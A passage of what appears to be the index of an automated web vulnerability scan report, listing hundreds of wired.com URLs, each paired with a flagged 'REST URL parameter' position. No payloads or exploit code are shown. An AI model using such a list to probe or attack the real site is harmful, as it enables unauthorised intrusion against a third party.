1.685. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 3]

1.686. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1127 [REST URL parameter 1]

1.687. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1127 [REST URL parameter 2]

1.688. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1127 [REST URL parameter 3]

1.689. http://www.wired.com/science/discoveries/news/2007/11/wiredscience [REST URL parameter 1]

1.690. http://www.wired.com/science/discoveries/news/2007/11/wiredscience [REST URL parameter 2]

1.691. http://www.wired.com/science/discoveries/news/2007/11/wiredscience [REST URL parameter 3]

1.692. http://www.wired.com/science/discoveries/news/2007/12/dayintech_1217 [REST URL parameter 1]

1.693. http://www.wired.com/science/discoveries/news/2007/12/dayintech_1217 [REST URL parameter 2]

1.694. http://www.wired.com/science/discoveries/news/2007/12/dayintech_1217 [REST URL parameter 3]

1.695. http://www.wired.com/science/discoveries/news/2008/02/dayintech_0226 [REST URL parameter 1]

1.696. http://www.wired.com/science/discoveries/news/2008/02/dayintech_0226 [REST URL parameter 2]

1.697. http://www.wired.com/science/discoveries/news/2008/02/dayintech_0226 [REST URL parameter 3]

1.698. http://www.wired.com/science/discoveries/news/2008/03/dayintech_0321 [REST URL parameter 1]

1.699. http://www.wired.com/science/discoveries/news/2008/03/dayintech_0321 [REST URL parameter 2]

1.700. http://www.wired.com/science/discoveries/news/2008/03/dayintech_0321 [REST URL parameter 3]

1.701. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0505 [REST URL parameter 1]

1.702. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0505 [REST URL parameter 2]

1.703. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0505 [REST URL parameter 3]

1.704. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0507 [REST URL parameter 1]

1.705. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0507 [REST URL parameter 2]

1.706. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0507 [REST URL parameter 3]

1.707. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0508 [REST URL parameter 1]

1.708. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0508 [REST URL parameter 2]

1.709. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0508 [REST URL parameter 3]

1.710. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0529 [REST URL parameter 1]

1.711. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0529 [REST URL parameter 2]

1.712. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0529 [REST URL parameter 3]

1.713. http://www.wired.com/science/discoveries/news/2008/07/dayintech_0703 [REST URL parameter 1]

1.714. http://www.wired.com/science/discoveries/news/2008/07/dayintech_0703 [REST URL parameter 2]

1.715. http://www.wired.com/science/discoveries/news/2008/07/dayintech_0703 [REST URL parameter 3]

1.716. http://www.wired.com/science/discoveries/news/2008/07/dayintech_0709 [REST URL parameter 1]

1.717. http://www.wired.com/science/discoveries/news/2008/07/dayintech_0709 [REST URL parameter 2]

1.718. http://www.wired.com/science/discoveries/news/2008/07/dayintech_0709 [REST URL parameter 3]

1.719. http://www.wired.com/science/discoveries/news/2008/08/dayintech_0812 [REST URL parameter 1]

1.720. http://www.wired.com/science/discoveries/news/2008/08/dayintech_0812 [REST URL parameter 2]

1.721. http://www.wired.com/science/discoveries/news/2008/08/dayintech_0812 [REST URL parameter 3]

1.722. http://www.wired.com/science/discoveries/news/2008/08/dayintech_0814 [REST URL parameter 1]

1.723. http://www.wired.com/science/discoveries/news/2008/08/dayintech_0814 [REST URL parameter 2]

1.724. http://www.wired.com/science/discoveries/news/2008/08/dayintech_0814 [REST URL parameter 3]

1.725. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0909 [REST URL parameter 1]

1.726. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0909 [REST URL parameter 2]

1.727. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0909 [REST URL parameter 3]

1.728. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0918 [REST URL parameter 1]

1.729. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0918 [REST URL parameter 2]

1.730. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0918 [REST URL parameter 3]

1.731. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0924 [REST URL parameter 1]

1.732. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0924 [REST URL parameter 2]

1.733. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0924 [REST URL parameter 3]

1.734. http://www.wired.com/science/discoveries/news/2008/10/dayintech_1009 [REST URL parameter 1]

1.735. http://www.wired.com/science/discoveries/news/2008/10/dayintech_1009 [REST URL parameter 2]

1.736. http://www.wired.com/science/discoveries/news/2008/10/dayintech_1009 [REST URL parameter 3]

1.737. http://www.wired.com/science/discoveries/news/2008/10/dayintech_1014 [REST URL parameter 1]

1.738. http://www.wired.com/science/discoveries/news/2008/10/dayintech_1014 [REST URL parameter 2]

1.739. http://www.wired.com/science/discoveries/news/2008/10/dayintech_1014 [REST URL parameter 3]

1.740. http://www.wired.com/science/discoveries/news/2008/11/dayintech_1110 [REST URL parameter 1]

1.741. http://www.wired.com/science/discoveries/news/2008/11/dayintech_1110 [REST URL parameter 2]

1.742. http://www.wired.com/science/discoveries/news/2008/11/dayintech_1110 [REST URL parameter 3]

1.743. http://www.wired.com/science/discoveries/news/2008/11/dayintech_1113 [REST URL parameter 1]

1.744. http://www.wired.com/science/discoveries/news/2008/11/dayintech_1113 [REST URL parameter 2]

1.745. http://www.wired.com/science/discoveries/news/2008/11/dayintech_1113 [REST URL parameter 3]

1.746. http://www.wired.com/science/discoveries/news/2009/01/dayintech_0123 [REST URL parameter 1]

1.747. http://www.wired.com/science/discoveries/news/2009/01/dayintech_0123 [REST URL parameter 2]

1.748. http://www.wired.com/science/discoveries/news/2009/01/dayintech_0123 [REST URL parameter 3]

1.749. http://www.wired.com/science/discoveries/news/2009/01/dayintech_0129 [REST URL parameter 1]

1.750. http://www.wired.com/science/discoveries/news/2009/01/dayintech_0129 [REST URL parameter 2]

1.751. http://www.wired.com/science/discoveries/news/2009/01/dayintech_0129 [REST URL parameter 3]

1.752. http://www.wired.com/science/discoveries/news/2009/02/dayintech_0205 [REST URL parameter 1]

1.753. http://www.wired.com/science/discoveries/news/2009/02/dayintech_0205 [REST URL parameter 2]

1.754. http://www.wired.com/science/discoveries/news/2009/02/dayintech_0205 [REST URL parameter 3]

1.755. http://www.wired.com/science/discoveries/news/2009/03/dayintech_0319 [REST URL parameter 1]

1.756. http://www.wired.com/science/discoveries/news/2009/03/dayintech_0319 [REST URL parameter 2]

1.757. http://www.wired.com/science/discoveries/news/2009/03/dayintech_0319 [REST URL parameter 3]

1.758. http://www.wired.com/science/discoveries/news/2009/03/dayintech_0331 [REST URL parameter 1]

1.759. http://www.wired.com/science/discoveries/news/2009/03/dayintech_0331 [REST URL parameter 2]

1.760. http://www.wired.com/science/discoveries/news/2009/03/dayintech_0331 [REST URL parameter 3]

1.761. http://www.wired.com/science/discoveries/news/2009/04/dayintech_0408 [REST URL parameter 1]

1.762. http://www.wired.com/science/discoveries/news/2009/04/dayintech_0408 [REST URL parameter 2]

1.763. http://www.wired.com/science/discoveries/news/2009/04/dayintech_0408 [REST URL parameter 3]

1.764. http://www.wired.com/science/planetearth [REST URL parameter 1]

1.765. http://www.wired.com/science/planetearth [REST URL parameter 2]

1.766. http://www.wired.com/science/space [REST URL parameter 1]

1.767. http://www.wired.com/science/space [REST URL parameter 2]

1.768. http://www.wired.com/search [REST URL parameter 1]

1.769. http://www.wired.com/services/corrections/ [REST URL parameter 1]

1.770. http://www.wired.com/services/corrections/ [REST URL parameter 2]

1.771. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 1]

1.772. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 2]

1.773. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]

1.774. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]

1.775. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 4]

1.776. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 5]

1.777. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 6]

1.778. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 7]

1.779. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 8]

1.780. http://www.wired.com/services/faq/ [REST URL parameter 1]

1.781. http://www.wired.com/services/faq/ [REST URL parameter 2]

1.782. http://www.wired.com/services/feedback/general [REST URL parameter 1]

1.783. http://www.wired.com/services/feedback/general [REST URL parameter 2]

1.784. http://www.wired.com/services/feedback/general [REST URL parameter 3]

1.785. http://www.wired.com/services/feedback/letterstowriter [REST URL parameter 1]

1.786. http://www.wired.com/services/feedback/letterstowriter [REST URL parameter 2]

1.787. http://www.wired.com/services/feedback/letterstowriter [REST URL parameter 3]

1.788. http://www.wired.com/services/newsletters [REST URL parameter 1]

1.789. http://www.wired.com/services/newsletters [REST URL parameter 2]

1.790. http://www.wired.com/services/press/ [REST URL parameter 1]

1.791. http://www.wired.com/services/press/ [REST URL parameter 2]

1.792. http://www.wired.com/services/privacy/ [REST URL parameter 1]

1.793. http://www.wired.com/services/privacy/ [REST URL parameter 2]

1.794. http://www.wired.com/services/rss/ [REST URL parameter 1]

1.795. http://www.wired.com/services/rss/ [REST URL parameter 2]

1.796. http://www.wired.com/services/sitemap/ [REST URL parameter 1]

1.797. http://www.wired.com/services/sitemap/ [REST URL parameter 2]

1.798. http://www.wired.com/services/staff/ [REST URL parameter 1]

1.799. http://www.wired.com/services/staff/ [REST URL parameter 2]

1.800. http://www.wired.com/services/useragreement/ [REST URL parameter 1]

1.801. http://www.wired.com/services/useragreement/ [REST URL parameter 2]

1.802. http://www.wired.com/software [REST URL parameter 1]

1.803. http://www.wired.com/software/ [REST URL parameter 1]

1.804. http://www.wired.com/software/coolapps [REST URL parameter 1]

1.805. http://www.wired.com/software/coolapps [REST URL parameter 2]

1.806. http://www.wired.com/software/softwarereviews [REST URL parameter 1]

1.807. http://www.wired.com/software/softwarereviews [REST URL parameter 2]

1.808. http://www.wired.com/software/webservices [REST URL parameter 1]

1.809. http://www.wired.com/software/webservices [REST URL parameter 2]

1.810. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 1]

1.811. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 2]

1.812. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 2]

1.813. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 3]

1.814. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 3]

1.815. http://www.wired.com/support/feedback.html [REST URL parameter 1]

1.816. http://www.wired.com/support/feedback.html [REST URL parameter 1]

1.817. http://www.wired.com/support/feedback.html [REST URL parameter 2]

1.818. http://www.wired.com/support/feedback.html [REST URL parameter 2]

1.819. http://www.wired.com/techbiz [REST URL parameter 1]

1.820. http://www.wired.com/techbiz/ [REST URL parameter 1]

1.821. http://www.wired.com/techbiz/it [REST URL parameter 1]

1.822. http://www.wired.com/techbiz/it [REST URL parameter 2]

1.823. http://www.wired.com/techbiz/it/magazine/16-05/mf_amazon [REST URL parameter 1]

1.824. http://www.wired.com/techbiz/it/magazine/16-05/mf_amazon [REST URL parameter 2]

1.825. http://www.wired.com/techbiz/it/magazine/16-05/mf_amazon [REST URL parameter 3]

1.826. http://www.wired.com/techbiz/media [REST URL parameter 1]

1.827. http://www.wired.com/techbiz/media [REST URL parameter 2]

1.828. http://www.wired.com/techbiz/media/news/2005/01/66333 [REST URL parameter 1]

1.829. http://www.wired.com/techbiz/media/news/2005/01/66333 [REST URL parameter 2]

1.830. http://www.wired.com/techbiz/media/news/2005/01/66333 [REST URL parameter 3]

1.831. http://www.wired.com/techbiz/people [REST URL parameter 1]

1.832. http://www.wired.com/techbiz/people [REST URL parameter 2]

1.833. http://www.wired.com/techbiz/startups [REST URL parameter 1]

1.834. http://www.wired.com/techbiz/startups [REST URL parameter 2]

1.835. http://www.wired.com/user/login [REST URL parameter 1]

1.836. http://www.wired.com/user/login [REST URL parameter 2]

1.837. http://www.wired.com/user/logout [REST URL parameter 1]

1.838. http://www.wired.com/user/logout [REST URL parameter 2]

1.839. http://www.wired.com/user/registration [REST URL parameter 1]

1.840. http://www.wired.com/user/registration [REST URL parameter 2]

1.841. http://www.wired.com/video [REST URL parameter 1]

1.842. http://www.wired.com/video/ [REST URL parameter 1]

1.843. http://www.wired.com/video/alt-text [REST URL parameter 1]

1.844. http://www.wired.com/video/alt-text [REST URL parameter 1]

1.845. http://www.wired.com/video/alt-text [REST URL parameter 2]

1.846. http://www.wired.com/video/alt-text [REST URL parameter 2]

1.847. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 1]

1.848. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 1]

1.849. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 2]

1.850. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 2]

1.851. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 3]

1.852. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 3]

1.853. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 1]

1.854. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 1]

1.855. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 2]

1.856. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 2]

1.857. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 3]

1.858. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 3]

1.859. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 1]

1.860. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 1]

1.861. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 2]

1.862. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 2]

1.863. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 3]

1.864. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 3]

1.865. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

1.866. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

1.867. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

1.868. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

1.869. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 3]

1.870. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 3]

1.871. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 1]

1.872. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 1]

1.873. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 2]

1.874. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 2]

1.875. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 3]

1.876. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 3]

1.877. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 1]

1.878. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 1]

1.879. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 2]

1.880. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 2]

1.881. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 3]

1.882. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 3]

1.883. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 1]

1.884. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 1]

1.885. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 2]

1.886. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 2]

1.887. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 3]

1.888. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 3]

1.889. http://www.wired.com/video/culture [REST URL parameter 1]

1.890. http://www.wired.com/video/culture [REST URL parameter 2]

1.891. http://www.wired.com/video/culture [REST URL parameter 2]

1.892. http://www.wired.com/video/events [REST URL parameter 1]

1.893. http://www.wired.com/video/events [REST URL parameter 2]

1.894. http://www.wired.com/video/events [REST URL parameter 2]

1.895. http://www.wired.com/video/gadgets [REST URL parameter 1]

1.896. http://www.wired.com/video/gadgets [REST URL parameter 2]

1.897. http://www.wired.com/video/gadgets [REST URL parameter 2]

1.898. http://www.wired.com/video/gaming [REST URL parameter 1]

1.899. http://www.wired.com/video/gaming [REST URL parameter 2]

1.900. http://www.wired.com/video/gaming [REST URL parameter 2]

1.901. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 1]

1.902. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 1]

1.903. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 2]

1.904. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 2]

1.905. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 3]

1.906. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 3]

1.907. http://www.wired.com/video/howto [REST URL parameter 1]

1.908. http://www.wired.com/video/howto [REST URL parameter 2]

1.909. http://www.wired.com/video/howto [REST URL parameter 2]

1.910. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 1]

1.911. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 1]

1.912. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 2]

1.913. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 2]

1.914. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 3]

1.915. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 3]

1.916. http://www.wired.com/video/interviews [REST URL parameter 1]

1.917. http://www.wired.com/video/interviews [REST URL parameter 2]

1.918. http://www.wired.com/video/interviews [REST URL parameter 2]

1.919. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 1]

1.920. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 1]

1.921. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 2]

1.922. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 2]

1.923. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 3]

1.924. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 3]

1.925. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 4]

1.926. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 5]

1.927. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 6]

1.928. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 1]

1.929. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 1]

1.930. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 2]

1.931. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 2]

1.932. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 3]

1.933. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 3]

1.934. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 4]

1.935. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 5]

1.936. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 6]

1.937. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

1.938. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

1.939. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

1.940. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

1.941. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

1.942. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

1.943. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 4]

1.944. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 5]

1.945. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 6]

1.946. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 1]

1.947. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 1]

1.948. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 2]

1.949. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 2]

1.950. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 3]

1.951. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 3]

1.952. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 4]

1.953. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 5]

1.954. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 6]

1.955. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 1]

1.956. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 1]

1.957. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 2]

1.958. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 2]

1.959. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 3]

1.960. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 3]

1.961. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 4]

1.962. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 5]

1.963. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 6]

1.964. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 1]

1.965. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 1]

1.966. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 2]

1.967. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 2]

1.968. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 3]

1.969. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 3]

1.970. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 4]

1.971. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 5]

1.972. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 6]

1.973. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 1]

1.974. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 1]

1.975. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 2]

1.976. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 2]

1.977. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 3]

1.978. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 3]

1.979. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 4]

1.980. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 5]

1.981. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 6]

1.982. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 1]

1.983. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 1]

1.984. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 2]

1.985. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 2]

1.986. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 3]

1.987. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 3]

1.988. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 4]

1.989. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 5]

1.990. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 6]

1.991. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 1]

1.992. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 1]

1.993. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 2]

1.994. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 2]

1.995. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 3]

1.996. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 3]

1.997. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 4]

